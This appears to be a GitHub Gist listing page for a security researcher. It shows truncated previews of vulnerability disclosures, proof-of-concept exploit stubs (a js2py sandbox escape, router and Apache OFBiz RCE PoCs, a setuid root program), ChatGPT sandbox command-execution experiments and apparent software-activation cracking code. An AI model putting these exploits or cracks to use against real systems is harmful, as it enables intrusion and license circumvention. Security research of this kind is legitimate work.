win3zz

ServiceNow Instance Exposing Sensitive Information via Unauthenticated Endpoints

• Date: 26 June 2023
• CWE-200: Exposure of Sensitive Information to an Unauthorized Actor
• Discovered by: Bipin Jitiya (@win3zz)

Summary

[REDACTED], Inc., uses ServiceNow with an instance named "[REDACTED]" accessible at https://[REDACTED].service-now.com/. Upon reviewing this instance, I observed that it is not sufficiently hardened for security, and some endpoints are exposing sensitive information. The following three endpoints, designed for performance monitoring, logging, and troubleshooting purposes, are accessible without authentication:

win3zz

ChatGPT's Advanced Data Analysis and Code Execution - Experiments

Recently, I learned that ChatGPT now allows advanced data analysis, which includes executing code (Python or possibly others). This feature is available to registered users via GPT-4o, albeit with limitations.

I quickly tried running system commands using this functionality, and here are the results:

It clearly shows that system commands can be executed through Python code in a sandboxed environment.

win3zz

CVE-2024-28397: js2py (JS interpreter) Sandbox Escape, bypassing restrictions to execute commands.

import js2py

js_code = """

function findpopen(o) {
    let result;
    for(let i in o.__subclasses__()) {
 let item = o.__subclasses__()[i]

win3zz

Compare Stock Performance Over Multiple Time Frames with Yahoo Finance API and Matplotlib

How to Use

Compare the performance of a stock across two or more time frames using the Yahoo Finance API and the Matplotlib Python library. Adjust the stock symbol and time frames according to your requirements and save the content in a file named script.py.

import requests
import matplotlib.pyplot as plt
from datetime import datetime

win3zz

/**
 * Offline Activator [Version 1.0.0 Beta]
 * 
 * @author Bipin Jitiya
 * @version 1.0
 * @since 2024-04-24
 */

import javax.crypto.Cipher;
import javax.crypto.spec.SecretKeySpec;

win3zz

TELESQUARE TLR-2005KSH Router vulnerable to unauthenticated OS command execution

• CVE: CVE-2024-29269
• Severity: Critical
• Details/Reference: https://github.com/wutalent/CVE-2024-29269/blob/main/index.md (archive)

PoC

File: script.py

win3zz

import javax.crypto.Cipher;
import javax.crypto.SecretKeyFactory;
import javax.crypto.spec.DESKeySpec;
import java.security.Key;
import java.security.MessageDigest;
import java.math.BigInteger;

public class GVHack {

    private static Key generateKey(String paramStr){

win3zz

Apache OfBiz Auth Bypass and RCE - PoC

• CVE: CVE-2023-51467
• Severity: Critical (CVSS 9.8)
• Root cause: https://github.com/apache/ofbiz-framework/blob/0530a58d3a912520b7f9e46c5ccde98fd3737bf5/framework/webtools/src/main/groovy/org/apache/ofbiz/webtools/entity/ProgramExport.groovy#L90
• Mitigation: Upgrade Apache OFBiz
• Reference: https://issues.apache.org/jira/browse/OFBIZ-12873

File: script.py

win3zz

Download Dependencies

user@hostname:~$ mkdir velocity-engine
user@hostname:~/velocity-engine$ wget https://dlcdn.apache.org/velocity/engine/2.3/velocity-engine-core-2.3.jar
user@hostname:~/velocity-engine$ wget https://dlcdn.apache.org/velocity/engine/2.3/velocity-engine-scripting-2.3.jar
user@hostname:~/velocity-engine$ wget https://dlcdn.apache.org/velocity/engine/2.3/spring-velocity-support-2.3.jar
user@hostname:~/velocity-engine$ wget https://repo1.maven.org/maven2/org/slf4j/slf4j-api/2.0.9/slf4j-api-2.0.9.jar
user@hostname:~/velocity-engine$ wget https://repo1.maven.org/maven2/org/apache/commons/commons-lang3/3.13.0/commons-lang3-3.13.0.jar
user@hostname:~/velocity-engine$ cd ..
user@hostname:~$

win3zz

user@hostname:~/exploit$ cat > test.c

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main() {
    if (setuid(0) != 0) {